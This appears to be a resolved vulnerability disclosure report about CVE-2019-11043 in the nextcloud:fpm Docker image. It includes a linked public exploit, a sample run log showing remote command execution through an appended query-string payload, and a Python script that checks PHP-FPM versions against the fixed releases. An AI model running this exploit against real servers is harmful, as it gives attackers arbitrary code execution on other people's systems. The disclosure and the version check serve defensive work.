Docker image with FPM is vulnerable to CVE-2019-11043
Critical
## Vulnerability Details
The CVE-2019-11043 vulnerability can be exploited in the latest nextcloud:fpm image.
This is due to the specific nginx configuration recommended for nextcloud:
- https://github.com/nextcloud/docker#base-version---fpm
- https://github.com/nextcloud/documentation/blob/master/admin_manual/installation/nginx.rst
- https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/mariadb/fpm/web/nginx.conf
Here's the exploit: https://github.com/neex/phuip-fpizdam
Sample exploit run:
```
# ./phuip-fpizdam http://localhost:8080/ocs/v2.php
2019/10/22 19:36:29 Base status code is 200
2019/10/22 19:36:30 Status code 502 for qsl=1765, adding as a candidate
2019/10/22 19:36:31 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/22 19:36:48 Attack params found: --qsl 1760 --pisos 191 --skip-detect
2019/10/22 19:36:48 Trying to set "session.auto_start=0"...
2019/10/22 19:36:50 Detect() returned attack params: --qsl 1760 --pisos 191 --skip-detect <-- REMEMBER THIS
2019/10/22 19:36:50 Performing attack using php.ini settings...
2019/10/22 19:36:52 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/22 19:36:52 Trying to cleanup /tmp/a...
2019/10/22 19:36:52 Done!
```
To fix the issue, the PHP-FPM version in the nextcloud:fpm image needs to be updated.
Reference: https://bugs.php.net/bug.php?id=78599
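As an added defender-side check (not part of this report or of the nextcloud project), the script below parses the PHP version printed by `php -v` inside the FPM image and compares it with the first releases that carried the fix for bug #78599 (7.1.33, 7.2.24 and 7.3.11). The `check_container` helper and the container name are assumptions, and the sample banner is constructed.

```python
import re
import subprocess
from typing import Optional, Tuple

# First fixed release per PHP branch for CVE-2019-11043 (bugs.php.net #78599).
# Branches older than 7.1 were end-of-life at the time and received no fix.
FIXED_IN = {(7, 1): (7, 1, 33), (7, 2): (7, 2, 24), (7, 3): (7, 3, 11)}


def parse_php_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from `php -v` / `php-fpm -v` output."""
    m = re.search(r"\bPHP (\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(version: Tuple[int, int, int]) -> bool:
    """True if this PHP-FPM release still carries the CVE-2019-11043 bug."""
    branch = (version[0], version[1])
    if branch in FIXED_IN:
        return version < FIXED_IN[branch]
    # 7.4 and later shipped after the fix; 7.0 and older never got one.
    return version < (7, 4, 0)


def check_container(container: str) -> bool:
    """Hypothetical helper: run `php -v` in a running container (e.g. the
    nextcloud:fpm service) and return True if its PHP-FPM is vulnerable.
    Requires Docker on the host; the container name is an assumption."""
    out = subprocess.run(["docker", "exec", container, "php", "-v"],
                         capture_output=True, text=True, check=True).stdout
    version = parse_php_version(out)
    if version is None:
        raise ValueError("could not parse PHP version from: " + out)
    return is_vulnerable(version)


# Constructed sample banner in the shape `php -v` prints inside the FPM image.
SAMPLE_BANNER = ("PHP 7.3.10 (fpm-fcgi) (built: Oct  9 2019 10:00:00)\n"
                 "Copyright (c) 1997-2018 The PHP Group")

if __name__ == "__main__":
    v = parse_php_version(SAMPLE_BANNER)
    print(v, "vulnerable" if is_vulnerable(v) else "patched")
```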
## Impact
Execute arbitrary PHP code on the target server
## Report Stats
- Report ID: 720306
- State: Closed
- Substate: resolved
- Upvotes: 14